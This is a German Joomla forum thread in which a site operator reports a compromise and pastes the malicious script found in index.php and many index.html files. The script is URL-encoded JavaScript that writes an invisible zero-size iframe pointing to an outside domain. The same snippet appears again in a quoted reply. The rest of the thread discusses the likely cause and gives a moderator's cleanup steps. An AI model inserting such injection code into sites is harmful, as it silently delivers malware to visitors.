+ Antworten
Seite 1 von 2 1 2 LetzteLetzte
Ergebnis 1 bis 10 von 11

Thema: Trojaner

  1. #1
    War schon öfter hier
    Registriert seit
    20.08.2006
    Beiträge
    165
    Bedankte sich
    9
    Erhielt 18 Danksagungen
    in 15 Beiträgen

    Standard Trojaner

    Leute,

    wir haben scheinbar Besuch bekommen.

    Folgendes in der index.php

    <!-- o --><script type="text/javascript">
    <!--
    document.write(unescape('%3C%69%66%72%61%6D%65%20% 73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%7A%65%6E %76%61%67%65%6E%2E%63%6F%6D%2F%69%6D%67%2F%69%6E%6 4%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20% 68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65 %3E'));
    //-->
    </script><!-- c -->

    Virenscanner meldet einen Trojaner

  2. #2
    Verbringt hier viel Zeit Avatar von sh4d0w
    Registriert seit
    12.03.2008
    Ort
    Lyss (Schweiz)
    Alter
    20
    Beiträge
    604
    Bedankte sich
    8
    Erhielt 148 Danksagungen
    in 130 Beiträgen

    Standard

    Öööm.. Jaaa.. Eemm..
    Interessiert mich eigentlich nicht wirklich
    Möchtest du ein Drink, was zu Futtern? Eeem.. Oder was meinst du? ^^

    Vielleicht mal Backup hochknallen? Joomla Version? Hoster kontaktieren.. Emm.. Ich glaub Einträge dazu findest du genügend
    Awesomeness
    When you get sad, stop being sad and be awesome instead

  3. #3
    War schon öfter hier
    Registriert seit
    20.08.2006
    Beiträge
    165
    Bedankte sich
    9
    Erhielt 18 Danksagungen
    in 15 Beiträgen

    Standard

    Nach weitere Suche habe ich ein Verzeichnis

    "ice_media"

    gefunden. Kann damit jemand was anfangen?

  4. #4
    Kommt häufiger vorbei Avatar von ismirlangweilig
    Registriert seit
    19.10.2006
    Ort
    Osnabrück
    Beiträge
    345
    Bedankte sich
    17
    Erhielt 84 Danksagungen
    in 76 Beiträgen

    Standard

    Ice Media ist ein Verzeichnis der Ice Gallery...
    http://www.fretties.de|http://www.frettchenfreunde-osnabrueck.de
    Falls Dir mein Beitrag geholfen hat bitte auf "danke" klicken

  5. #5
    Wohnt hier Avatar von Kubik-Rubik
    Registriert seit
    20.10.2005
    Ort
    Kubik-Rubik.de
    Beiträge
    2.737
    Bedankte sich
    177
    Erhielt 1.059 Danksagungen
    in 793 Beiträgen

    Standard

    Zitat Zitat von Free Beitrag anzeigen
    Leute,

    wir haben scheinbar Besuch bekommen.

    Folgendes in der index.php

    <!-- o --><script type="text/javascript">
    <!--
    document.write(unescape('%3C%69%66%72%61%6D%65%20% 73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%7A%65%6E %76%61%67%65%6E%2E%63%6F%6D%2F%69%6D%67%2F%69%6E%6 4%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20% 68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65 %3E'));
    //-->
    </script><!-- c -->

    Virenscanner meldet einen Trojaner
    Tipp zur weiteren Vorgehensweise...

    Gruß
    Joomla! Extensions by Kubik-Rubik.de
    Keine Beantwortung von Supportanfragen per PN

    Joomla! braucht Dich!

  6. #6
    War schon öfter hier
    Registriert seit
    20.08.2006
    Beiträge
    165
    Bedankte sich
    9
    Erhielt 18 Danksagungen
    in 15 Beiträgen

    Standard

    Wen es interessiert, wir fanden den Code in folgenden Dateien:

    index.php
    templates\index.html
    modules\index.html
    media\index.html
    mambots\index.html
    language\index.html
    includes\index.html
    images\index.html
    help\index.html
    editor\index.html
    components\index.html
    cache\index.html

    und natürlich in der index.php des Templates.

    Die Datenbank ist verschont geblieben

    Die Ursache, ist wie so oft, ein mangelndes Verständnis für die Wichtigkeit des Passwortes. Der Kunde benutzte ein 6-stelliges Wort, aus dem Duden.

    @sh4d0w

    Danke für Dein kreatives Feedback.

    Ich googelte nach dem Schadcode und fand nur 2 Treffer, die offtopic waren. Also dachte ich, dies sei für die Joomlaner von Interesse.

    Gut, ich werde solche Infos nicht mehr posten. Dieses "übers Maul fahren" mit der omnipräsenten Warnung "Suchfunktion benutzen", die immer gern gesehen ist, hängt mir langsam zum Hals raus.

    @ Admin

    Bitte lösche mein Account

    Danke!

  7. #7
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.301
    Bedankte sich
    66
    Erhielt 1.258 Danksagungen
    in 1.101 Beiträgen

    Standard

    Zitat Zitat von Free Beitrag anzeigen
    Die Ursache, ist wie so oft, ein mangelndes Verständnis für die Wichtigkeit des Passwortes.
    Sicher?
    Welches Passwort ist gemeint? Das für FTP oder für den Admin-Zugang?

  8. #8
    War schon öfter hier
    Registriert seit
    20.08.2006
    Beiträge
    165
    Bedankte sich
    9
    Erhielt 18 Danksagungen
    in 15 Beiträgen

    Standard

    Hi flotte,

    FTP + Admin + Webspace Zugang

    lg, free

  9. #9
    Hat hier eine Zweitwohnung Avatar von N8Surfer
    Registriert seit
    01.09.2005
    Beiträge
    1.683
    Bedankte sich
    63
    Erhielt 356 Danksagungen
    in 325 Beiträgen

    Standard

    Zitat Zitat von Free Beitrag anzeigen
    Gut, ich werde solche Infos nicht mehr posten. Dieses "übers Maul fahren" mit der omnipräsenten Warnung "Suchfunktion benutzen", die immer gern gesehen ist, hängt mir langsam zum Hals raus.

    @ Admin

    [B]Bitte lösche mein Account

    Danke!
    Tust du uns bitten einen Gefallen und scherst nicht alle über einen Kamm? Weiter ist deine Meldung "wir haben scheinbar Besuch bekommen. Folgendes in der index.php...", ohne weitere Infos (J!-Version, installieter Komponenten etc.) nicht nachvollziehbar.

    Mit dem PW hat dein Problem am wenigsten zu tun... darum der Tipp, mal die SuFu zu benutzen. Oder soll es jemand anderes für dich machen und hier posten?
    Greetinxx N8Surfer

    Wenn man etwas haben möchte, was man noch nie gehabt hat,
    dann muss man etwas tun, was man noch nie getan hat.

  10. #10
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.301
    Bedankte sich
    66
    Erhielt 1.258 Danksagungen
    in 1.101 Beiträgen

    Standard

    Ob das was mit dem Passwort zu tun hat oder nciht, kann man pauschal weder verneinen noch bejahren. Wir hatten schon einige Fälle, wo FTP-Passwörter bekannt waren und darüber ein Web geändert wurde (auch nur die index.php's in den Ordnern). Der Standard-Angriff ist aber das Ausnutzen von Script-Lücken.
    Hier helfen nur die Webserverlogs UND FTP-Logs, um zweifelsfrei festzustellen zu können, woher der Angriff kam. Nur die Tatsache des Vorhandenseins eines simplen Paswortes ist kein Beweis für dessen Ausnutzung.
    Wurden die Logs geprüft und wurde die Angreifer-IP erkannt und wurden alle Aktivitäten zu dieser IP tatsächlich identifiziert?

    Wenn nicht oder wenn nicht mehr möglich oder überhaupt nicht möglich (warum auch immer), dann muss ich meine Standleier runterbeten, wo diese dann bei Punkt 3) schon aufhört.

    1) Sofort den gesamten Auftritt mit allen Dateien entfernen (sichern!)
    2) Datenbankinhalt entfernen
    3) Letzte definitv saubere Sicherung einspielen
    4) Alle Passwörter ändern (Datenbank, Joomla, FTP, etc.)
    5) Log-Dateien holen und Einbruchslücke lokalisieren
    6) Lücke schließen!

+ Antworten
Seite 1 von 2 1 2 LetzteLetzte

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein